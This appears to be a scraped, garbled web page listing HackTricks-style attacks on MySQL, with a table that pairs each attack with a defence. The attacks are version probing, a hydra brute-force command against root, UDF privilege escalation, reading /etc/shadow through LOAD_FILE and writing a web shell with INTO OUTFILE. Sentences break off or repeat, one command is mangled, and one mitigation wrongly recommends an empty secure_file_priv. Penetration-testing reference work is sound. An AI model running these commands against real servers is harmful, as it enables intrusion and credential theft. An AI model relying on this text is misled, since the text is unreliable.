Verified - Mysql Hacktricks

HackTricks documents known vulnerabilities in older or misconfigured versions, such as the , where a user could log in with any password by repeatedly attempting to connect. 4. Post-Exploitation Once access is gained, verified steps involve: Extracting password hashes from mysql.user .

Works when secure_file_priv = '' or NULL (MySQL 5.5+). If secure_file_priv = '/tmp/' , you can only read from /tmp/ .

Before attempting login, verify the service and its version to check for known vulnerabilities like CVE-2012-2122 (Authentication Bypass). Port Scanning: Default is Nmap Scripts: Use specialized scripts for automated discovery: nmap -sV -p mysql hacktricks verified

| Attack Vector | Verified HackTricks Technique | Defensive Mitigation | |---------------|-------------------------------|----------------------| | Credential brute‑force | hydra -l root -P wordlist.txt mysql://target | Enforce account lockout, use strong passwords, restrict network access to 3306 | | UDF privilege escalation | Uploading udf.so to plugin directory | Set secure_file_priv = "" or a specific safe directory; run MySQL as non‑root user | | File read via LOAD_FILE | SELECT LOAD_FILE('/etc/shadow') | Disable FILE privilege unless absolutely necessary; use SELinux/apparmor | | Writing web shell | INTO OUTFILE to webroot | Set secure_file_priv to a directory not accessible by the web server; use prepared statements against SQLi |

Then read it via SSH if you have shell access. Works when secure_file_priv = '' or NULL (MySQL 5

SELECT @@plugin_dir;

SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE privilege_type = 'FILE'; Port Scanning: Default is Nmap Scripts: Use specialized

If you only have SELECT / INSERT privileges, try: